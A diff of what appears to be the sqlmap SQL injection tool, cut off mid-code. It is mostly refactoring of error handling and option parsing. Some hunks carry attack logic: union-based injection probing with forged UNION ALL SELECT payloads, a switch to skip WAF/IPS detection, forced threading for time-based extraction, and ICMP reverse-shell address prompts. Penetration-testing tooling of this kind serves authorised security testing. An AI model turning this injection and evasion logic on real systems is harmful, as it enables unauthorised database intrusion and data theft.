if conf.titles and conf.nullConnection:
errMsg = "switch '--titles' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
@ -2404,6 +2424,10 @@ def _basicOptionValidation():
errMsg = "switch '--tor' is incompatible with option '--proxy'"
raise SqlmapSyntaxException(errMsg)
if conf.proxy and conf.proxyFile:
errMsg = "switch '--proxy' is incompatible with option '--proxy-file'"
raise SqlmapSyntaxException(errMsg)
if conf.checkTor and not any((conf.tor, conf.proxy)):
errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)"
raise SqlmapSyntaxException(errMsg)
@ -2471,6 +2495,7 @@ def _resolveCrossReferences():
lib.core.common.getPageTemplate = getPageTemplate
lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage
lib.request.connect.setHTTPProxy = _setHTTPProxy
lib.utils.google.setHTTPProxy = _setHTTPProxy
lib.controller.checks.setVerbosity = setVerbosity
def initOptions(inputOptions=AttribDict(), overrideOptions=False):

View File

@ -37,7 +37,7 @@ optDict = {
"headers": "string",
"authType": "string",
"authCred": "string",
"authPrivate": "string",
"authFile": "string",
"proxy": "string",
"proxyCred": "string",
"proxyFile": "string",
@ -205,6 +205,7 @@ optDict = {
"saveConfig": "string",
"scope": "string",
"testFilter": "string",
"testSkip": "string",
"updateAll": "boolean",
},
@ -231,6 +232,7 @@ optDict = {
"cpuThrottle": "integer",
"forceDns": "boolean",
"identifyWaf": "boolean",
"skipWaf": "boolean",
"ignore401": "boolean",
"smokeTest": "boolean",
"liveTest": "boolean",

View File

@ -8,9 +8,11 @@ See the file 'doc/COPYING' for copying permission
import sqlite3
from extra.safe2bin.safe2bin import safechardecode
from lib.core.common import getSafeExString
from lib.core.common import unsafeSQLIdentificatorNaming
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapValueException
from lib.core.settings import UNICODE_ENCODING
class Replication(object):
"""
@ -49,11 +51,16 @@ class Replication(object):
self.name = unsafeSQLIdentificatorNaming(name)
self.columns = columns
if create:
self.execute('DROP TABLE IF EXISTS "%s"' % self.name)
if not typeless:
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns)))
else:
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns)))
try:
self.execute('DROP TABLE IF EXISTS "%s"' % self.name)
if not typeless:
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns)))
else:
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns)))
except Exception, ex:
errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
errMsg += "located at '%s'" % self.parent.dbpath
raise SqlmapGenericException(errMsg)
def insert(self, values):
"""
@ -70,7 +77,7 @@ class Replication(object):
try:
self.parent.cursor.execute(sql, parameters)
except sqlite3.OperationalError, ex:
errMsg = "problem occurred ('%s') while accessing sqlite database " % unicode(ex)
errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
errMsg += "it's not used by some other program"
raise SqlmapGenericException(errMsg)

View File

@ -42,6 +42,9 @@ CONSTANT_RATIO = 0.9
# Ratio used in heuristic check for WAF/IDS/IPS protected targets
IDS_WAF_CHECK_RATIO = 0.5
# Timeout used in heuristic check for WAF/IDS/IPS protected targets
IDS_WAF_CHECK_TIMEOUT = 10
# Lower and upper values for match ratio in case of stable page
LOWER_RATIO_BOUND = 0.02
UPPER_RATIO_BOUND = 0.98
@ -219,6 +222,8 @@ USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
REFERER_ALIASES = ("ref", "referer", "referrer")
HOST_ALIASES = ("host",)
HSQLDB_DEFAULT_SCHEMA = "PUBLIC"
# Names that can't be used to name files on Windows OS
WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")

View File

@ -39,7 +39,6 @@ from lib.core.enums import POST_HINT
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import SqlmapSystemException
from lib.core.exception import SqlmapUserQuitException
from lib.core.option import _setDBMS

View File

@ -10,7 +10,7 @@ import threading
import time
import traceback
from thread import error as threadError
from thread import error as ThreadError
from lib.core.data import conf
from lib.core.data import kb
@ -89,9 +89,9 @@ def exceptionHandledFunction(threadFunction):
kb.threadContinue = False
kb.threadException = True
raise
except Exception, errMsg:
except Exception, ex:
# thread is just going to be silently killed
logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
def setDaemon(thread):
# Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation
@ -145,8 +145,8 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
try:
thread.start()
except threadError, errMsg:
errMsg = "error occurred while starting new thread ('%s')" % errMsg
except ThreadError, ex:
errMsg = "error occurred while starting new thread ('%s')" % ex.message
logger.critical(errMsg)
break
@ -178,10 +178,10 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
if forwardException:
raise
except (SqlmapConnectionException, SqlmapValueException), errMsg:
except (SqlmapConnectionException, SqlmapValueException), ex:
print
kb.threadException = True
logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
except:
from lib.core.common import unhandledExceptionMessage

View File

@ -30,7 +30,7 @@ def update():
if not os.path.exists(os.path.join(rootDir, ".git")):
errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
errMsg += "from GitHub (e.g. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev)"
errMsg += "from GitHub (e.g. 'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')"
logger.error(errMsg)
else:
infoMsg = "updating sqlmap to the latest development version from the "
@ -51,7 +51,12 @@ def update():
_ = lib.core.settings.REVISION = getRevisionNumber()
logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _))
else:
logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())
if "Not a git repository" in stderr:
errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
errMsg += "from GitHub (e.g. 'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')"
logger.error(errMsg)
else:
logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())
if not success:
if IS_WIN:

View File

@ -36,14 +36,17 @@ from lib.core.shell import clearHistory
from lib.core.shell import loadHistory
from lib.core.shell import saveHistory
def cmdLineParser():
def cmdLineParser(argv=None):
"""
This function parses the command line parameters and arguments
"""
if not argv:
argv = sys.argv
checkSystemEncoding()
_ = getUnicode(os.path.basename(sys.argv[0]), encoding=sys.getfilesystemencoding())
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding())
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
"\"%s\"" % _ if " " in _ else _)
@ -141,8 +144,8 @@ def cmdLineParser():
help="HTTP authentication credentials "
"(name:password)")
request.add_option("--auth-private", dest="authPrivate",
help="HTTP authentication PEM private key file")
request.add_option("--auth-file", dest="authFile",
help="HTTP authentication PEM cert/private key file")
request.add_option("--ignore-401", dest="ignore401", action="store_true",
help="Ignore HTTP Error 401 (Unauthorized)")
@ -671,6 +674,9 @@ def cmdLineParser():
general.add_option("--test-filter", dest="testFilter",
help="Select tests by payloads and/or titles (e.g. ROW)")
general.add_option("--test-skip", dest="testSkip",
help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")
general.add_option("--update", dest="updateAll",
action="store_true",
help="Update sqlmap")
@ -710,6 +716,10 @@ def cmdLineParser():
action="store_true",
help="Make a thorough testing for a WAF/IPS/IDS protection")
miscellaneous.add_option("--skip-waf", dest="skipWaf",
action="store_true",
help="Skip heuristic detection of WAF/IPS/IDS protection")
miscellaneous.add_option("--mobile", dest="mobile",
action="store_true",
help="Imitate smartphone through HTTP User-Agent header")
@ -756,6 +766,9 @@ def cmdLineParser():
parser.add_option("--force-dns", dest="forceDns", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--force-threads", dest="forceThreads", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--smoke-test", dest="smokeTest", action="store_true",
help=SUPPRESS_HELP)
@ -767,6 +780,9 @@ def cmdLineParser():
parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP)
parser.add_option("--nnc5ed", dest="nnc5ed", action="store_true",
help=SUPPRESS_HELP) # temporary hidden switch :)
parser.add_option_group(target)
parser.add_option_group(request)
parser.add_option_group(optimization)
@ -802,14 +818,15 @@ def cmdLineParser():
option = parser.get_option("-h")
option.help = option.help.capitalize().replace("this help", "basic help")
argv = []
_ = []
prompt = False
advancedHelp = True
extraHeaders = []
for arg in sys.argv:
argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
for arg in argv:
_.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
argv = _
checkDeprecatedOptions(argv)
prompt = "--sqlmap-shell" in argv
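
The new optional argv parameter lets a caller (for example the --sqlmap-shell loop) hand the parser a prepared argument vector instead of always reading sys.argv. A standalone sketch of the same calling convention, with a made-up option set rather than sqlmap's real one:

```python
# Standalone sketch of the cmdLineParser(argv=None) pattern: fall back to
# sys.argv when no vector is supplied, so the same parser serves both the
# command line and programmatic callers (option set below is illustrative).
import sys
from optparse import OptionParser

def cmd_line_parser(argv=None):
    if not argv:
        argv = sys.argv
    parser = OptionParser()
    parser.add_option("-u", "--url", dest="url", help="Target URL")
    options, _ = parser.parse_args(argv[1:])
    return options

# Command-line use reads sys.argv; a shell/wrapper passes its own vector:
options = cmd_line_parser(["sqlmap.py", "-u", "http://www.example.com/?id=1"])
print(options.url)
```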

View File

@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.common import checkFile
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import openFile
from lib.core.common import unArrayizeValue
@ -67,7 +68,7 @@ def configFileParser(configFile):
config = UnicodeRawConfigParser()
config.readfp(configFP)
except Exception, ex:
errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % ex.message
errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex)
raise SqlmapSyntaxException(errMsg)
if not config.has_section("Target"):

View File

@ -128,9 +128,16 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
count += 1
else:
break
if count:
seq1 = seq1[count:]
seq2 = seq2[count:]
try:
_seq1 = seq1[count:]
_seq2 = seq2[count:]
except MemoryError:
pass
else:
seq1 = _seq1
seq2 = _seq2
while True:
try:

View File

@ -5,6 +5,7 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import binascii
import compiler
import httplib
import json
@ -40,6 +41,7 @@ from lib.core.common import getCurrentThreadData
from lib.core.common import getHeader
from lib.core.common import getHostHeader
from lib.core.common import getRequestHeader
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import logHTTPTraffic
from lib.core.common import pushValue
@ -142,6 +144,7 @@ class Connect(object):
warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to "
warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')"
singleTimeWarnMessage(warnMsg)
elif kb.originalPage is None:
if conf.tor:
warnMsg = "please make sure that you have "
@ -158,13 +161,12 @@ class Connect(object):
warnMsg += "with the switch '--random-agent' turned on "
warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)"
singleTimeWarnMessage(warnMsg)
elif conf.threads > 1:
warnMsg = "if the problem persists please try to lower "
warnMsg += "the number of used threads (option '--threads')"
singleTimeWarnMessage(warnMsg)
time.sleep(1)
kwargs['retrying'] = True
return Connect._getPageProxy(**kwargs)
@ -183,7 +185,11 @@ class Connect(object):
kb.pageCompress = False
else:
while True:
_ = conn.read(MAX_CONNECTION_CHUNK_SIZE)
if not conn:
break
else:
_ = conn.read(MAX_CONNECTION_CHUNK_SIZE)
if len(_) == MAX_CONNECTION_CHUNK_SIZE:
warnMsg = "large response detected. This could take a while"
singleTimeWarnMessage(warnMsg)
@ -433,6 +439,11 @@ class Connect(object):
logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
if conf.cj:
for cookie in conf.cj:
if cookie.value is None:
cookie.value = ""
conn = urllib2.urlopen(req)
if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
@ -497,22 +508,22 @@ class Connect(object):
if hasattr(conn.fp, '_sock'):
conn.fp._sock.close()
conn.close()
except Exception, msg:
warnMsg = "problem occurred during connection closing ('%s')" % msg
except Exception, ex:
warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex)
logger.warn(warnMsg)
except urllib2.HTTPError, e:
except urllib2.HTTPError, ex:
page = None
responseHeaders = None
try:
page = e.read() if not skipRead else None
responseHeaders = e.info()
responseHeaders[URI_HTTP_HEADER] = e.geturl()
page = ex.read() if not skipRead else None
responseHeaders = ex.info()
responseHeaders[URI_HTTP_HEADER] = ex.geturl()
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
except socket.timeout:
warnMsg = "connection timed out while trying "
warnMsg += "to get error page information (%d)" % e.code
warnMsg += "to get error page information (%d)" % ex.code
logger.warn(warnMsg)
return None, None, None
except KeyboardInterrupt:
@ -522,13 +533,13 @@ class Connect(object):
finally:
page = page if isinstance(page, unicode) else getUnicode(page)
code = e.code
code = ex.code
kb.originalCode = kb.originalCode or code
threadData.lastHTTPError = (threadData.lastRequestUID, code)
kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
status = getUnicode(e.msg)
status = getUnicode(ex.msg)
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
if responseHeaders:
@ -545,11 +556,11 @@ class Connect(object):
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
if e.code == httplib.UNAUTHORIZED and not conf.ignore401:
if ex.code == httplib.UNAUTHORIZED and not conf.ignore401:
errMsg = "not authorized, try to provide right HTTP "
errMsg += "authentication type and valid credentials (%d)" % code
raise SqlmapConnectionException(errMsg)
elif e.code == httplib.NOT_FOUND:
elif ex.code == httplib.NOT_FOUND:
if raise404:
errMsg = "page not found (%d)" % code
raise SqlmapConnectionException(errMsg)
@ -557,11 +568,11 @@ class Connect(object):
debugMsg = "page not found (%d)" % code
singleTimeLogMessage(debugMsg, logging.DEBUG)
processResponse(page, responseHeaders)
elif e.code == httplib.GATEWAY_TIMEOUT:
elif ex.code == httplib.GATEWAY_TIMEOUT:
if ignoreTimeout:
return None, None, None
else:
warnMsg = "unable to connect to the target URL (%d - %s)" % (e.code, httplib.responses[e.code])
warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code])
if threadData.retriesCount < conf.retries and not kb.threadException:
warnMsg += ". sqlmap is going to retry the request"
logger.critical(warnMsg)
@ -575,7 +586,7 @@ class Connect(object):
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
logger.debug(debugMsg)
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e:
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException):
tbMsg = traceback.format_exc()
if "no host given" in tbMsg:
@ -619,7 +630,11 @@ class Connect(object):
return None, None, None
elif threadData.retriesCount < conf.retries and not kb.threadException:
warnMsg += ". sqlmap is going to retry the request"
logger.critical(warnMsg)
if not retrying:
warnMsg += "(s)"
logger.critical(warnMsg)
else:
logger.debug(warnMsg)
return Connect._retryProxy(**kwargs)
elif kb.testMode:
logger.critical(warnMsg)
@ -628,7 +643,7 @@ class Connect(object):
raise SqlmapConnectionException(warnMsg)
finally:
if not isinstance(page, unicode):
if isinstance(page, basestring) and not isinstance(page, unicode):
if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]):
page = unicode(page, errors="ignore")
else:
@ -718,7 +733,7 @@ class Connect(object):
payload = function(payload=payload, headers=auxHeaders)
except Exception, ex:
errMsg = "error occurred while running tamper "
errMsg += "function '%s' ('%s')" % (function.func_name, ex)
errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex))
raise SqlmapGenericException(errMsg)
if not isinstance(payload, basestring):
@ -834,7 +849,7 @@ class Connect(object):
if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
token = page
if not token and any(_.name == conf.csrfToken for _ in conf.cj):
if not token and conf.cj and any(_.name == conf.csrfToken for _ in conf.cj):
for _ in conf.cj:
if _.name == conf.csrfToken:
token = _.value
@ -889,7 +904,7 @@ class Connect(object):
if conf.evalCode:
delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
variables = {"uri": uri, "lastPage": threadData.lastPage}
variables = {"uri": uri, "lastPage": threadData.lastPage, "_locals": locals()}
originals = {}
keywords = keyword.kwlist
@ -1051,9 +1066,9 @@ class Connect(object):
_, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
if headers:
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH):
pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers:
elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE):
pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
finally:
kb.pageCompress = popValue()

View File

@ -9,6 +9,7 @@ import httplib
import socket
import urllib2
from lib.core.common import getSafeExString
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
@ -55,9 +56,9 @@ class HTTPSConnection(httplib.HTTPSConnection):
break
else:
sock.close()
except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex:
self._tunnel_host = None
logger.debug("SSL connection error occurred ('%s')" % errMsg)
logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex))
# Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
# https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
@ -75,9 +76,9 @@ class HTTPSConnection(httplib.HTTPSConnection):
break
else:
sock.close()
except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex:
self._tunnel_host = None
logger.debug("SSL connection error occurred ('%s')" % errMsg)
logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex))
if not success:
raise SqlmapConnectionException("can't establish SSL connection")

View File

@ -39,6 +39,7 @@ from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
@ -78,7 +79,7 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
if not (timeBasedCompare and kb.dnsTest):
if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not timeBasedCompare:
if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not (timeBasedCompare and not conf.forceThreads):
if field and re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I):
expression = "SELECT %s FROM (%s)" % (field, expression)
@ -262,9 +263,14 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
return None
try:
for num in xrange(startLimit, stopLimit):
output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
outputs.append(output)
try:
for num in xrange(startLimit, stopLimit):
output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
outputs.append(output)
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
raise SqlmapDataException(errMsg)
except KeyboardInterrupt:
print

View File

@ -11,12 +11,13 @@ import urllib2
from lib.core.data import conf
class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
def __init__(self, key_file):
def __init__(self, auth_file):
urllib2.HTTPSHandler.__init__(self)
self.key_file = key_file
self.auth_file = auth_file
def https_open(self, req):
return self.do_open(self.getConnection, req)
def getConnection(self, host, timeout=None):
return httplib.HTTPSConnection(host, key_file=self.key_file, timeout=conf.timeout)
# Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain
return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout)
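
Passing the same PEM file as both cert_file and key_file assumes the client certificate and its private key are concatenated in a single file, which is what the renamed --auth-file option now expects. A hedged standalone illustration of that convention (host and path are placeholders):

```python
# Standalone illustration of the combined-PEM convention: Python's HTTPS client
# accepts one file for both the client certificate and the private key when the
# two are concatenated in PEM format (host and path below are placeholders).
import httplib  # Python 2 naming, as in the module above; http.client on Python 3

auth_file = "/path/to/client-cert-and-key.pem"
conn = httplib.HTTPSConnection("www.example.com", cert_file=auth_file,
                               key_file=auth_file, timeout=30)
conn.request("GET", "/")
print(conn.getresponse().status)
```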

View File

@ -30,6 +30,7 @@ from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS
from lib.core.settings import MAX_TOTAL_REDIRECTIONS
from lib.core.threads import getCurrentThreadData
from lib.request.basic import decodePage
from lib.request.basic import parseResponse
class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
def _get_header_redirect(self, headers):
@ -118,6 +119,8 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
result = fp
if redurl and kb.redirectChoice == REDIRECTION.YES:
parseResponse(content, headers)
req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl)
if headers and HTTP_HEADER.SET_COOKIE in headers:
req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0]

View File

@ -18,6 +18,7 @@ from lib.core.common import readInput
from lib.core.data import conf
from lib.core.data import logger
from lib.core.data import paths
from lib.core.exception import SqlmapDataException
class ICMPsh:
"""
@ -41,6 +42,9 @@ class ICMPsh:
while not address:
address = readInput(message, default=self.remoteIP)
if conf.batch and not address:
raise SqlmapDataException("remote host address is missing")
return address
def _selectLhost(self):
@ -53,6 +57,9 @@ class ICMPsh:
while not address:
address = readInput(message, default=self.localIP)
if conf.batch and not address:
raise SqlmapDataException("local host address is missing")
return address
def _prepareIngredients(self, encode=True):

View File

@ -258,7 +258,7 @@ class UDF:
else:
logger.warn("invalid value, only digits are allowed")
for x in range(0, udfCount):
for x in xrange(0, udfCount):
while True:
msg = "what is the name of the UDF number %d? " % (x + 1)
udfName = readInput(msg)
@ -293,7 +293,7 @@ class UDF:
else:
logger.warn("invalid value, only digits >= 0 are allowed")
for y in range(0, parCount):
for y in xrange(0, parCount):
msg = "what is the data-type of input parameter "
msg += "number %d? (default: %s) " % ((y + 1), defaultType)

View File

@ -146,12 +146,12 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
if showEta:
progress = ProgressBar(maxValue=length)
if timeBasedCompare and conf.threads > 1:
if timeBasedCompare and conf.threads > 1 and not conf.forceThreads:
warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically"
singleTimeWarnMessage(warnMsg)
if numThreads > 1:
if not timeBasedCompare:
if not timeBasedCompare or conf.forceThreads:
debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else ""))
logger.debug(debugMsg)
else:
@ -232,8 +232,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# Used for gradual expanding into unicode charspace
shiftTable = [2, 2, 3, 3, 5, 4]
if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl:
charTbl.remove(ord('\n'))
if "'%s'" % CHAR_INFERENCE_MARK in payload:
for char in ('\n', '\r'):
if ord(char) in charTbl:
charTbl.remove(ord(char))
if not charTbl:
return None
@ -597,8 +599,9 @@ def queryOutputLength(expression, payload):
infoMsg = "retrieving the length of query output"
logger.info(infoMsg)
lengthExprUnescaped = agent.forgeQueryOutputLength(expression)
start = time.time()
lengthExprUnescaped = agent.forgeQueryOutputLength(expression)
count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS)
debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start))

View File

@ -28,9 +28,9 @@ from lib.core.enums import HASHDB_KEYS
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.settings import METADB_SUFFIX
from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE
from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE
from lib.core.settings import METADB_SUFFIX
from lib.core.threads import getCurrentThreadData
from lib.core.threads import runThreads
from lib.request import inject
@ -102,7 +102,7 @@ def tableExists(tableFile, regex=None):
break
if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table)
fullTableName = "%s.%s" % (conf.db, table)
else:
fullTableName = table

View File

@ -165,74 +165,78 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
# Unbiased approach for searching appropriate usable column
random.shuffle(positions)
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test if the target URL is
# affected by an exploitable union SQL injection vulnerability
for position in positions:
# Prepare expression with delimiters
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)
phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop)
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.escape(randQueryProcessed)
for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS):
if vector:
break
# Forge the union SQL injection request
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test if the target URL is
# affected by an exploitable union SQL injection vulnerability
for position in positions:
# Prepare expression with delimiters
randQuery = randomStr(charCount)
phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop)
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.escape(randQueryProcessed)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
# Forge the union SQL injection request
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
if content and phrase in content:
validPayload = payload
kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters
randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS)
phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop)
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)
if content and phrase in content:
validPayload = payload
kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1
